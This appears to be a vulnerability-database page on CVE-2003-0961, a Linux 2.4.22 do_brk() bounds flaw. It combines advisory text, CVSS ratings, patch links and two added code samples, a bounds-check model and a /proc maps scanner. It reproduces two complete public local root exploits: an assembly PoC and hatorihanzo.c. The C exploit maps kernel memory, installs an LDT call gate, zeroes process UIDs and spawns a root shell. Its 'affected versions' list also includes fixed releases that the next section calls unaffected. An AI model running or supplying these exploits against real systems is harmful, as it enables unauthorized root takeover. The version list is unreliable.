CVE-2003-0961
CVSS 7.2
Published: 2003-12-15 00:00:00
Last revised: 2016-10-17 22:38:31
NMCOES    

[Original] Integer overflow in the do_brk function for the brk system call in Linux kernel 2.4.22 and earlier allows local users to gain root privileges.


[CNNVD] Linux kernel do_brk() insufficient parameter bounds checking vulnerability (CNNVD-200312-060)

        
Linux is an open-source operating system.
The do_brk() function in the Linux kernel lacks adequate bounds checking on its arguments; a local attacker can exploit this to obtain root privileges.
The Linux kernel on x86 machines manages memory with a simple flat model: each user process has an address range from 0 to TASK_SIZE bytes. Memory above that limit cannot be accessed by user processes and holds the kernel's code and data structures. A user process is divided into several logical segments, called virtual memory areas (VMAs); the kernel tracks and manages a process's VMAs to provide proper memory management and memory protection.
do_brk() is an internal kernel function used, indirectly, to grow and shrink a process's heap (brk). It is a simplified version of the mmap(2) system call that handles only anonymous mappings (such as uninitialized data). The function lacks proper bounds checking on its arguments, which can be exploited to create an arbitrarily large virtual memory area that extends beyond the user-accessible limit, so that kernel memory above that limit becomes part of the user process.
A typical user process memory layout looks like this:
bash$ cat /proc/self/maps
08048000-0804c000 r-xp 00000000 03:02 207935 /bin/cat
0804c000-0804d000 rw-p 00003000 03:02 207935 /bin/cat
0804d000-0804e000 rwxp 00000000 00:00 0
40000000-40015000 r-xp 00000000 03:02 207495 /lib/ld-2.3.2.so
40015000-40016000 rw-p 00014000 03:02 207495 /lib/ld-2.3.2.so
40016000-40017000 rw-p 00000000 00:00 0
40020000-40021000 rw-p 00000000 00:00 0
42000000-4212f000 r-xp 00000000 03:02 319985 /lib/tls/libc-2.3.2.so
4212f000-42132000 rw-p 0012f000 03:02 319985 /lib/tls/libc-2.3.2.so
42132000-42134000 rw-p 00000000 00:00 0
bfffe000-c0000000 rwxp fffff000 00:00 0
do_brk() is called from the ELF and a.out loaders and from the brk(2) system call; these are three different paths through which the do_brk() flaw can be reached. After successful exploitation, the process's memory can contain a large mapping such as:
080a5000-c891d000 rwxp 00000000 00:00 0
A local attacker can use this vulnerability to take full control of the system, including obtaining UID 0 privileges and modifying kernel code and data structures.
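The bounds check the description says do_brk() lacks, modeled in user space as an added example (not the kernel's mm/mmap.c and not code from this advisory): the 2.4.22-style path accepts a heap extension that reaches into the kernel half of the address space, while the 2.4.23-style check rejects both that case and a length that wraps around 4 GB. TASK_SIZE is the i386 3G/1G split named in the text; the exact form of the 2.4.23 check is an assumption, and the rlimit, map-count and memory-accounting checks both kernels perform are left out.

```c
/* User-space model of the do_brk() length check behind CVE-2003-0961.
 * Added illustration, not kernel source: the rlimit, map-count and
 * memory-accounting checks are omitted, and the shape of the 2.4.23
 * check is reproduced from memory (assumption). */
#include <stdio.h>
#include <stdint.h>

#define TASK_SIZE   0xC0000000U   /* i386: user space is 0 .. TASK_SIZE */
#define KPAGE_SIZE  4096U

typedef enum { BRK_OK, BRK_EINVAL } brk_result;

/* Round a length up to whole pages, as do_brk() does first. */
static uint32_t page_align(uint32_t len)
{
    return (len + KPAGE_SIZE - 1) & ~(KPAGE_SIZE - 1);
}

/* 2.4.22 and earlier (vulnerable): the new region [addr, addr+len) is
 * never compared with TASK_SIZE, so a large len lets the heap VMA cover
 * the kernel half of the address space, or wrap around 4 GB. */
brk_result do_brk_check_2_4_22(uint32_t addr, uint32_t len)
{
    (void)addr;                 /* addr never enters any bound check */
    len = page_align(len);
    if (len == 0)
        return BRK_OK;
    return BRK_OK;              /* no bound on addr + len at all */
}

/* 2.4.23 (fixed): reject a region that ends above TASK_SIZE, and one
 * whose end wraps below its start; the second clause is what turns the
 * "integer overflow" in the CVE title into a clean -EINVAL. */
brk_result do_brk_check_2_4_23(uint32_t addr, uint32_t len)
{
    len = page_align(len);
    if (len == 0)
        return BRK_OK;
    if ((uint32_t)(addr + len) > TASK_SIZE || (uint32_t)(addr + len) < addr)
        return BRK_EINVAL;
    return BRK_OK;
}

int main(void)
{
    /* The oversized VMA quoted in the advisory: 080a5000-c891d000. */
    uint32_t start = 0x080a5000U, end = 0xc891d000U;
    printf("2.4.22: %s\n",
           do_brk_check_2_4_22(start, end - start) == BRK_OK ? "accepted" : "rejected");
    printf("2.4.23: %s\n",
           do_brk_check_2_4_23(start, end - start) == BRK_OK ? "accepted" : "rejected");
    /* A request whose end wraps past 4 GB lands below TASK_SIZE after the
     * wrap, so only the addr + len < addr clause catches it. */
    printf("wrap, 2.4.23: %s\n",
           do_brk_check_2_4_23(0xBFFF0000U, 0x40020000U) == BRK_OK ? "accepted" : "rejected");
    return 0;
}
```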
        

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No matching OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0961
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0961
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-060
(Official data source) CNNVD

- Other links and resources

http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000796
(UNKNOWN)  CONECTIVA  CLA-2003:796
http://isec.pl/papers/linux_kernel_do_brk.pdf
(UNKNOWN)  MISC  http://isec.pl/papers/linux_kernel_do_brk.pdf
http://marc.info/?l=bugtraq&m=107064798706473&w=2
(UNKNOWN)  BUGTRAQ  20031204 [iSEC] Linux kernel do_brk() vulnerability details
http://marc.info/?l=bugtraq&m=107064830206816&w=2
(UNKNOWN)  BUGTRAQ  20031204 Hot fix for do_brk bug
http://marc.info/?l=bugtraq&m=107394143105081&w=2
(UNKNOWN)  BUGTRAQ  20040112 SmoothWall Project Security Advisory SWP-2004:001
http://www.debian.org/security/2003/dsa-403
(VENDOR_ADVISORY)  DEBIAN  DSA-403
http://www.debian.org/security/2004/dsa-417
(UNKNOWN)  DEBIAN  DSA-417
http://www.debian.org/security/2004/dsa-423
(UNKNOWN)  DEBIAN  DSA-423
http://www.debian.org/security/2004/dsa-433
(UNKNOWN)  DEBIAN  DSA-433
http://www.debian.org/security/2004/dsa-439
(UNKNOWN)  DEBIAN  DSA-439
http://www.debian.org/security/2004/dsa-440
(UNKNOWN)  DEBIAN  DSA-440
http://www.debian.org/security/2004/dsa-442
(UNKNOWN)  DEBIAN  DSA-442
http://www.debian.org/security/2004/dsa-450
(UNKNOWN)  DEBIAN  DSA-450
http://www.debian.org/security/2004/dsa-470
(UNKNOWN)  DEBIAN  DSA-470
http://www.debian.org/security/2004/dsa-475
(UNKNOWN)  DEBIAN  DSA-475
http://www.kb.cert.org/vuls/id/301156
(UNKNOWN)  CERT-VN  VU#301156
http://www.mandriva.com/security/advisories?name=MDKSA-2003:110
(UNKNOWN)  MANDRAKE  MDKSA-2003:110
http://www.novell.com/linux/security/advisories/2003_049_kernel.html
(UNKNOWN)  SUSE  SuSE-SA:2003:049
http://www.redhat.com/support/errata/RHSA-2003-368.html
(UNKNOWN)  REDHAT  RHSA-2003:368
http://www.redhat.com/support/errata/RHSA-2003-389.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2003:389

- Vulnerability information

Linux kernel do_brk() insufficient parameter bounds checking vulnerability
High risk  Boundary condition error
2003-12-15 00:00:00 2005-10-20 00:00:00
Local
        

- Advisories and patches

Workaround:
If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
* Use the ulimit -d command to limit the data segment size of user processes; this temporarily mitigates the problem.
Vendor patch:
Linux
-----
The vendor has released an upgrade patch to fix this security issue; download it from the vendor's site:

http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.23.bz2

- Vulnerability information (129)

Linux Kernel 2.4.22 "do_brk()" local Root Exploit (PoC) (EDBID:129)
linux local
2003-12-02 Verified
0 Christophe Devine
N/A [Download]
; Christophe Devine (devine at cr0.net) and Julien Tinnes (julien at cr0.org)
;
; This exploit uses sys_brk directly to expand his break and doesn't rely
; on the ELF loader to do it.
;
; To bypass a check in sys_brk against available memory, we use a high
; virtual address as base address
;
; In most case (let's say when no PaX w/ ASLR :) we have to move the stack
; so that we can expand our break
;


  BITS 32

                org     0xBFFF0000

  ehdr:                                                 ; Elf32_Ehdr
                db      0x7F, "ELF", 1, 1, 1            ;   e_ident
        times 9 db      0
                dw      2                               ;   e_type
                dw      3                               ;   e_machine
                dd      1                               ;   e_version
                dd      _start                          ;   e_entry
                dd      phdr - $$                       ;   e_phoff
                dd      0                               ;   e_shoff
                dd      0                               ;   e_flags
                dw      ehdrsize                        ;   e_ehsize
                dw      phdrsize                        ;   e_phentsize
                dw      2                               ;   e_phnum
                dw      0                               ;   e_shentsize
                dw      0                               ;   e_shnum
                dw      0                               ;   e_shstrndx

  ehdrsize      equ     $ - ehdr

  phdr:                                                 ; Elf32_Phdr
                dd      1                               ;   p_type
                dd      0                               ;   p_offset
                dd      $$                              ;   p_vaddr
                dd      $$                              ;   p_paddr
                dd      filesize                        ;   p_filesz
                dd      filesize                        ;   p_memsz
                dd      7                               ;   p_flags
                dd      0x1000                          ;   p_align

  phdrsize      equ     $ - phdr

  _start:

		; ** Make sure the stack is not above us

                mov     eax, 163         ; mremap
                mov     ebx, esp
		
		and	ebx, ~(0x1000 - 1)	; align to page size

		mov	ecx, 0x1000	; we suppose stack is one page only
                mov     edx, 0x9000	; be sure it can't get mapped after
					; us
                mov     esi,1		; MREMAP_MAYMOVE
                int     0x80


		and	esp, (0x1000 - 1)	; offset in page
		add	esp, eax		; stack ptr to new location
						; nb: we don't fix
						; pointers so environ/cmdline
						; are not available

  		mov	eax,152		; mlockall (for tests as root)
  		mov	ebx,2		; MCL_FUTURE
  		int	0x80

		; get VMAs for the kernel memory

                mov     eax,45          ; brk
                mov     ebx,0xC0500000
		int	0x80

		
		mov	ecx, 4
  loop0:
		
  		mov	eax, 2		; fork
  		int	0x80
		loop	loop0

  _idle:

                mov     eax,162         ; nanosleep
                mov     ebx,timespec
                int     0x80
                jmp     _idle

  timespec      dd      10,0

  filesize      equ     $ - $$

; milw0rm.com [2003-12-02]
		

- Vulnerability information (131)

Linux Kernel <= 2.4.22 (do_brk) Local Root Exploit (working) (EDBID:131)
linux local
2003-12-05 Verified
0 Wojciech Purczynski
N/A [Download]
/*
 * hatorihanzo.c
 * Linux kernel do_brk vma overflow exploit.
 *
 * The bug was found by Paul (IhaQueR) Starzetz <paul@isec.pl>
 *
 * Further research and exploit development by
 * Wojciech Purczynski <cliph@isec.pl> and Paul Starzetz.
 *
 * (c) 2003 Copyright by IhaQueR and cliph. All Rights Reserved.
 *
 * COPYING, PRINTING, DISTRIBUTION, MODIFICATION, COMPILATION AND ANY USE
 * OF PRESENTED CODE IS STRICTLY PROHIBITED.
 */

#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <paths.h>
#include <grp.h>
#include <setjmp.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/ucontext.h>
#include <sys/wait.h>
#include <asm/ldt.h>
#include <asm/page.h>
#include <asm/segment.h>
#include <linux/unistd.h>
#include <linux/linkage.h>

#define kB * 1024
#define MB * 1024 kB
#define GB * 1024 MB

#define MAGIC 0xdefaced /* I should've patented this number -cliph */
#define ENTRY_MAGIC 0
#define ENTRY_GATE 2
#define ENTRY_CS 4
#define ENTRY_DS 6
#define CS ((ENTRY_CS << 2) | 4)
#define DS ((ENTRY_DS << 2) | 4)
#define GATE ((ENTRY_GATE << 2) | 4 | 3)
#define LDT_PAGES ((LDT_ENTRIES*LDT_ENTRY_SIZE+PAGE_SIZE-1) / PAGE_SIZE)
#define TOP_ADDR 0xFFFFE000U

/* configuration */
unsigned task_size;
unsigned page;
uid_t uid;
unsigned address;
int dontexit = 0;

void fatal(char * msg)
{
    fprintf(stderr, "[-] %s: %s\n", msg, strerror(errno));
    if (dontexit) {
        fprintf(stderr, "[-] Unable to exit, entering neverending loop.\n");
        kill(getpid(), SIGSTOP);
        for (;;) pause();
    }
    exit(EXIT_FAILURE);
}

void configure(void)
{
    unsigned val;
    task_size = ((unsigned)&val + 1 GB ) / (1 GB) * 1 GB;
    uid = getuid();
}

void expand(void)
{
    unsigned top = (unsigned) sbrk(0);
    unsigned limit = address + PAGE_SIZE;
    do {
        if (sbrk(PAGE_SIZE) == NULL)
            fatal("Kernel seems not to be vulnerable");
        dontexit = 1;
        top += PAGE_SIZE;
    } while (top < limit);
}

jmp_buf jmp;

#define MAP_NOPAGE 1
#define MAP_ISPAGE 2

void sigsegv(int signo, siginfo_t * si, void * ptr)
{
    struct ucontext * uc = (struct ucontext *) ptr;
    int error_code = uc->uc_mcontext.gregs[REG_ERR];
    (void)signo;
    (void)si;
    error_code = MAP_NOPAGE + (error_code & 1);
    longjmp(jmp, error_code);
}

void prepare(void)
{
    struct sigaction sa;
    sa.sa_sigaction = sigsegv;
    sa.sa_flags = SA_SIGINFO | SA_NOMASK;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGSEGV, &sa, NULL);
}

int testaddr(unsigned addr)
{
    int val;
    val = setjmp(jmp);
    if (val == 0) {
        asm ("verr (%%eax)" : : "a" (addr));
        return MAP_ISPAGE;
    }
    return val;
}

#define map_pages (((TOP_ADDR - task_size) + PAGE_SIZE - 1) / PAGE_SIZE)
#define map_size (map_pages + 8*sizeof(unsigned) - 1) / (8*sizeof(unsigned))
#define next(u, b) do { if ((b = 2*b) == 0) { b = 1; u++; } } while(0)

void map(unsigned * map)
{
    unsigned addr = task_size;
    unsigned bit = 1;
    prepare();
    while (addr < TOP_ADDR) {
        if (testaddr(addr) == MAP_ISPAGE)
            *map |= bit;
        addr += PAGE_SIZE;
        next(map, bit);
    }
    signal(SIGSEGV, SIG_DFL);
}

void find(unsigned * m)
{
    unsigned addr = task_size;
    unsigned bit = 1;
    unsigned count;
    unsigned tmp;
    prepare();
    tmp = address = count = 0U;
    while (addr < TOP_ADDR) {
        int val = testaddr(addr);
        if (val == MAP_ISPAGE && (*m & bit) == 0) {
            if (!tmp) tmp = addr;
            count++;
        } else {
            if (tmp && count == LDT_PAGES) {
                errno = EAGAIN;
                if (address)
                    fatal("double allocation\n");
                address = tmp;
            }
            tmp = count = 0U;
        }
        addr += PAGE_SIZE;
        next(m, bit);
    }
    signal(SIGSEGV, SIG_DFL);
    if (address)
        return;
    errno = ENOTSUP;
    fatal("Unable to determine kernel address");
}

int modify_ldt(int, void *, unsigned);

void ldt(unsigned * m)
{
    struct modify_ldt_ldt_s l;
    map(m);
    memset(&l, 0, sizeof(l));
    l.entry_number = LDT_ENTRIES - 1;
    l.seg_32bit = 1;
    l.base_addr = MAGIC >> 16;
    l.limit = MAGIC & 0xffff;
    if (modify_ldt(1, &l, sizeof(l)) == -1)
        fatal("Unable to set up LDT");
    l.entry_number = ENTRY_MAGIC / 2;
    if (modify_ldt(1, &l, sizeof(l)) == -1)
        fatal("Unable to set up LDT");
    find(m);
}

asmlinkage void kernel(unsigned * task)
{
    unsigned * addr = task;
    /* looking for uids */
    while (addr[0] != uid || addr[1] != uid ||
           addr[2] != uid || addr[3] != uid)
        addr++;
    addr[0] = addr[1] = addr[2] = addr[3] = 0; /* uids */
    addr[4] = addr[5] = addr[6] = addr[7] = 0; /* uids */
    addr[8] = 0;
    /* looking for vma */
    for (addr = (unsigned *) task_size; addr; addr++) {
        if (addr[0] >= task_size && addr[1] < task_size &&
            addr[2] == address && addr[3] >= task_size) {
            addr[2] = task_size - PAGE_SIZE;
            addr = (unsigned *) addr[3];
            addr[1] = task_size - PAGE_SIZE;
            addr[2] = task_size;
            break;
        }
    }
}

void kcode(void);

#define __str(s) #s
#define str(s) __str(s)

void __kcode(void)
{
    asm(
        "kcode: \n"
        " pusha \n"
        " pushl %es \n"
        " pushl %ds \n"
        " movl $(" str(DS) ") ,%edx \n"
        " movl %edx,%es \n"
        " movl %edx,%ds \n"
        " movl $0xffffe000,%eax \n"
        " andl %esp,%eax \n"
        " pushl %eax \n"
        " call kernel \n"
        " addl $4, %esp \n"
        " popl %ds \n"
        " popl %es \n"
        " popa \n"
        " lret \n"
    );
}

void knockout(void)
{
    unsigned * addr = (unsigned *) address;
    if (mprotect(addr, PAGE_SIZE, PROT_READ|PROT_WRITE) == -1)
        fatal("Unable to change page protection");
    errno = ESRCH;
    if (addr[ENTRY_MAGIC] != MAGIC)
        fatal("Invalid LDT entry");
    /* setting call gate and privileged descriptors */
    addr[ENTRY_GATE+0] = ((unsigned)CS << 16) | ((unsigned)kcode & 0xffffU);
    addr[ENTRY_GATE+1] = ((unsigned)kcode & ~0xffffU) | 0xec00U;
    addr[ENTRY_CS+0] = 0x0000ffffU; /* kernel 4GB code at 0x00000000 */
    addr[ENTRY_CS+1] = 0x00cf9a00U;
    addr[ENTRY_DS+0] = 0x0000ffffU; /* user 4GB code at 0x00000000 */
    addr[ENTRY_DS+1] = 0x00cf9200U;
    prepare();
    if (setjmp(jmp) != 0) {
        errno = ENOEXEC;
        fatal("Unable to jump to call gate");
    }
    asm("lcall $" str(GATE) ",$0x0"); /* this is it */
}

void shell(void)
{
    char * argv[] = { _PATH_BSHELL, NULL };
    execve(_PATH_BSHELL, argv, environ);
    fatal("Unable to spawn shell\n");
}

void remap(void)
{
    static char stack[8 MB]; /* new stack */
    static char * envp[] = { "PATH=" _PATH_STDPATH, NULL };
    static unsigned * m;
    static unsigned b;
    m = (unsigned *) sbrk(map_size);
    if (!m)
        fatal("Unable to allocate memory");
    environ = envp;
    asm ("movl %0, %%esp\n" : : "a" (stack + sizeof(stack)));
    b = ((unsigned)sbrk(0) + PAGE_SIZE - 1) & PAGE_MASK;
    if (munmap((void*)b, task_size - b) == -1)
        fatal("Unable to unmap stack");
    while (b < task_size) {
        if (sbrk(PAGE_SIZE) == NULL)
            fatal("Unable to expand BSS");
        b += PAGE_SIZE;
    }
    ldt(m);
    expand();
    knockout();
    shell();
}

int main(void)
{
    configure();
    remap();
    return EXIT_FAILURE;
}

// milw0rm.com [2003-12-05]
		

- Vulnerability information

2887
Linux Kernel do_brk local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified, Uncoordinated Disclosure, Discovered in the Wild

- Vulnerability description

A flaw exists in the Linux kernel which allows a local user to map kernel memory segments into an unprivileged process. Specifically, the do_brk function does not verify that the allocated memory range does not exceed the TASK_SIZE constant. The do_brk function is called by the ELF executable loader and the mmap system call; however, only the mmap method is exploitable. Once kernel memory access has been obtained, a number of tricks can be used to gain superuser privileges.
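A defender-side check for the symptom this entry describes, added here as an example that is not part of the OSVDB record: parse /proc/<pid>/maps lines and flag any VMA that ends above TASK_SIZE, using the healthy layout and the oversized mapping quoted earlier on this page as constructed input. The TASK_SIZE constant assumes an i386 3G/1G split; on another architecture pass the split that applies there, or the scan will report every high mapping.

```c
/* Scanner for the post-exploitation indicator shown on this page: a VMA
 * in /proc/<pid>/maps whose end lies above TASK_SIZE. Added example, not
 * code from the advisory; the constant assumes an i386 3G/1G split. */
#include <stdio.h>
#include <string.h>

#define I386_TASK_SIZE 0xC0000000ULL

/* One mapping, as parsed from a maps line: "start-end perms ..." */
struct vma {
    unsigned long long start, end;
    char perms[5];
};

/* Parse one maps line; returns 1 on success, 0 if it is not a maps entry.
 * Leading whitespace (as in the indented listing above) is skipped. */
int parse_maps_line(const char *line, struct vma *v)
{
    return sscanf(line, "%llx-%llx %4s", &v->start, &v->end, v->perms) == 3;
}

/* A user VMA must end at or below TASK_SIZE (the stack on the page ends
 * exactly at c0000000 and is fine); anything past it covers kernel memory. */
int vma_reaches_kernel(const struct vma *v, unsigned long long task_size)
{
    return v->end > task_size || v->start >= task_size;
}

/* Scan a maps listing held in memory (newline separated, NUL terminated);
 * returns the number of offending VMAs and reports each one on stderr. */
int scan_maps_text(const char *text, unsigned long long task_size)
{
    int bad = 0;
    const char *p = text;
    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t n = nl ? (size_t)(nl - p) : strlen(p);
        char line[256];
        struct vma v;
        if (n >= sizeof line)
            n = sizeof line - 1;
        memcpy(line, p, n);
        line[n] = '\0';
        if (parse_maps_line(line, &v) && vma_reaches_kernel(&v, task_size)) {
            fprintf(stderr, "suspicious VMA %llx-%llx %s\n", v.start, v.end, v.perms);
            bad++;
        }
        p = nl ? nl + 1 : p + n;
    }
    return bad;
}

/* Same check against a live file such as /proc/<pid>/maps on an i386 host;
 * returns -1 if the file cannot be opened. */
int scan_maps_file(const char *path, unsigned long long task_size)
{
    FILE *f = fopen(path, "r");
    char line[256];
    int bad = 0;
    if (!f)
        return -1;
    while (fgets(line, sizeof line, f)) {
        struct vma v;
        if (parse_maps_line(line, &v) && vma_reaches_kernel(&v, task_size))
            bad++;
    }
    fclose(f);
    return bad;
}

/* Constructed samples taken from the listings quoted on this page. */
static const char healthy_maps[] =
    "08048000-0804c000 r-xp 00000000 03:02 207935 /bin/cat\n"
    "0804d000-0804e000 rwxp 00000000 00:00 0\n"
    "bfffe000-c0000000 rwxp fffff000 00:00 0\n";
static const char exploited_maps[] =
    "08048000-0804c000 r-xp 00000000 03:02 207935 /bin/cat\n"
    "080a5000-c891d000 rwxp 00000000 00:00 0\n";

int main(void)
{
    printf("healthy: %d suspicious VMA(s)\n", scan_maps_text(healthy_maps, I386_TASK_SIZE));
    printf("exploited: %d suspicious VMA(s)\n", scan_maps_text(exploited_maps, I386_TASK_SIZE));
    return 0;
}
```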

- Timeline

2003-12-01 Unknown
Unknown Unknown

- Solution

Upgrade the linux kernel to version 2.4.23 or higher, as it has been reported to fix this vulnerability. This can be done through various Linux vendor patches or manually installing a newer kernel. An upgrade is required as there are no known workarounds.

- References

- Credit

Unknown or Incomplete

- Vulnerability information

Linux Kernel do_brk Function Boundary Condition Vulnerability
Class: Boundary Condition Error  BID: 9138
Remote: No  Local: Yes
2003-12-01 12:00:00 2009-07-12 12:56:00
Discovery of this vulnerability has been credited to Andrew Morton. This issue was also independently discovered by Paul Starzetz <ihaquer@isec.pl>.

- Affected program versions

VMWare ESX Server 2.0.1 build 6403
VMWare ESX Server 2.0.1
VMWare ESX Server 2.0
VMWare ESX Server 1.5.2
Trustix Secure Linux 2.0
Sun Cobalt RaQ 550
SmoothWall Express 2.0
Linux kernel 2.6 -test9
Linux kernel 2.6 -test5
Linux kernel 2.6 -test4
Linux kernel 2.6 -test3
Linux kernel 2.6 -test2
Linux kernel 2.6 -test1
Linux kernel 2.5.69
Linux kernel 2.5.68
Linux kernel 2.5.67
Linux kernel 2.5.66
Linux kernel 2.5.65
Linux kernel 2.5.64
Linux kernel 2.5.63
Linux kernel 2.5.62
Linux kernel 2.5.61
Linux kernel 2.5.60
Linux kernel 2.5.59
Linux kernel 2.5.58
Linux kernel 2.5.57
Linux kernel 2.5.56
Linux kernel 2.5.55
Linux kernel 2.5.54
Linux kernel 2.5.53
Linux kernel 2.5.52
Linux kernel 2.5.51
Linux kernel 2.5.50
Linux kernel 2.5.49
Linux kernel 2.5.48
Linux kernel 2.5.47
Linux kernel 2.5.46
Linux kernel 2.5.45
Linux kernel 2.5.44
Linux kernel 2.5.43
Linux kernel 2.5.42
Linux kernel 2.5.41
Linux kernel 2.5.40
Linux kernel 2.5.39
Linux kernel 2.5.38
Linux kernel 2.5.37
Linux kernel 2.5.36
Linux kernel 2.5.35
Linux kernel 2.5.34
Linux kernel 2.5.33
Linux kernel 2.5.32
Linux kernel 2.5.31
Linux kernel 2.5.30
Linux kernel 2.5.29
Linux kernel 2.5.28
Linux kernel 2.5.27
Linux kernel 2.5.26
Linux kernel 2.5.25
Linux kernel 2.5.24
Linux kernel 2.5.23
Linux kernel 2.5.22
Linux kernel 2.5.21
Linux kernel 2.5.20
Linux kernel 2.5.19
Linux kernel 2.5.18
Linux kernel 2.5.17
Linux kernel 2.5.16
Linux kernel 2.5.15
Linux kernel 2.5.14
Linux kernel 2.5.13
Linux kernel 2.5.12
Linux kernel 2.5.11
Linux kernel 2.5.10
Linux kernel 2.5.9
Linux kernel 2.5.8
Linux kernel 2.5.7
Linux kernel 2.5.6
Linux kernel 2.5.5
Linux kernel 2.5.4
Linux kernel 2.5.3
Linux kernel 2.5.2
Linux kernel 2.5.1
Linux kernel 2.5 .0
Linux kernel 2.4.22
+ Devil-Linux Devil-Linux 1.0.5
+ Devil-Linux Devil-Linux 1.0.4
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ Red Hat Fedora Core1
+ Slackware Linux 9.1
Linux kernel 2.4.21
+ Conectiva Linux 9.0
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Red Hat Enterprise Linux AS 3
+ RedHat Desktop 3.0
+ RedHat Enterprise Linux ES 3
+ RedHat Enterprise Linux WS 3
+ S.u.S.E. Linux Personal 9.0 x86_64
+ S.u.S.E. Linux Personal 9.0
+ SuSE SUSE Linux Enterprise Server 8
Linux kernel 2.4.20
Linux kernel 2.4.19
+ Conectiva Linux 8.0
+ Conectiva Linux Enterprise Edition 1.0
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 9.0
+ S.u.S.E. Linux 8.1
+ Slackware Linux -current
+ SuSE SUSE Linux Enterprise Server 8
+ SuSE SUSE Linux Enterprise Server 7
Linux kernel 2.4.18
+ Astaro Security Linux 2.0 23
+ Astaro Security Linux 2.0 16
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0
+ Red Hat Enterprise Linux AS 2.1 IA64
+ RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
+ RedHat Advanced Workstation for the Itanium Processor 2.1
+ RedHat Linux 8.0
+ RedHat Linux 7.3
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux 8.0
+ S.u.S.E. Linux 7.3
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux Connectivity Server
+ S.u.S.E. Linux Database Server 0
+ S.u.S.E. Linux Firewall on CD
+ S.u.S.E. Linux Office Server
+ S.u.S.E. Linux Openexchange Server
+ S.u.S.E. Linux Personal 8.2
+ S.u.S.E. SuSE eMail Server 3.1
+ S.u.S.E. SuSE eMail Server III
+ SuSE SUSE Linux Enterprise Server 8
+ SuSE SUSE Linux Enterprise Server 7
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
Linux kernel 2.4.17
Linux kernel 2.4.16
Linux kernel 2.4.15
Linux kernel 2.4.14
Linux kernel 2.4.13
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Workstation 3.1.1
Linux kernel 2.4.12
+ Conectiva Linux 7.0
Linux kernel 2.4.11
Linux kernel 2.4.10
Linux kernel 2.4.9
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ Sun Linux 5.0.5
+ Sun Linux 5.0.3
+ Sun Linux 5.0
Linux kernel 2.4.8
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0
Linux kernel 2.4.7
+ RedHat Linux 7.2
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
Linux kernel 2.4.6
Linux kernel 2.4.5
+ Slackware Linux 8.0
Linux kernel 2.4.4
+ S.u.S.E. Linux 7.2
Linux kernel 2.4.3
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
Linux kernel 2.4.2
Linux kernel 2.4.1
Linux kernel 2.4
Astaro Security Linux 4.0 16
Astaro Security Linux 4.0 08
SGI ProPack 2.3
Linux kernel 2.6 -test9
Linux kernel 2.6 -test8
Linux kernel 2.6 -test7
Linux kernel 2.6 -test6
Linux kernel 2.6 -test11
Linux kernel 2.6 -test10
Linux kernel 2.4.23
+ Trustix Secure Linux 2.0
Astaro Security Linux 4.0 17

- Unaffected program versions

SGI ProPack 2.3
Linux kernel 2.6 -test9
Linux kernel 2.6 -test8
Linux kernel 2.6 -test7
Linux kernel 2.6 -test6
Linux kernel 2.6 -test11
Linux kernel 2.6 -test10
Linux kernel 2.4.23
+ Trustix Secure Linux 2.0
Astaro Security Linux 4.0 17

- Vulnerability discussion

